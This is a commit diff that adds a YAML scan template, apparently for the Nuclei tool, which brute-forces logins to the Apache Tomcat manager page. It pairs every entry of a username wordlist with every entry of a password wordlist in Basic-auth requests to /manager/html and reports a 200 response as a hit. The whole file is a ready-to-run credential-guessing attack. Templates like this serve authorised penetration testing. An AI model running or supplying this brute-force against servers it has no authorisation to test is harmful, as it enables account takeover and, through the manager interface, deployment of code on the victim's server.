adding tomcat manager bruteforce

Author: ehsandeep

brute-force/tomcat-manager-bruteforce.yaml

@@ -0,0 +1,30 @@
+id: tomcat-manager-bruteforce
+info:
+  name: tomcat-manager-bruteforce-fuzzing
+  author: pdteam
+  severity: high
+
+requests:
+  - payloads:
+      username: username.txt
+      password: password.txt
+
+      # make sure you have your wordlist on the defind path. 
+
+    attack: clusterbomb  # Available options: sniper, pitchfork and clusterbomb
+
+    raw:
+      # Request with simple param and header manipulation with DSL functions
+      - |
+        GET /manager/html HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64(username:password)}}
+        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0      
+        Accept-Encoding: gzip, deflate        
+        Accept-Language: en-US,en;q=0.9
+        Connection: close
+
+    matchers:
+      - type: status
+        status:
+          - 200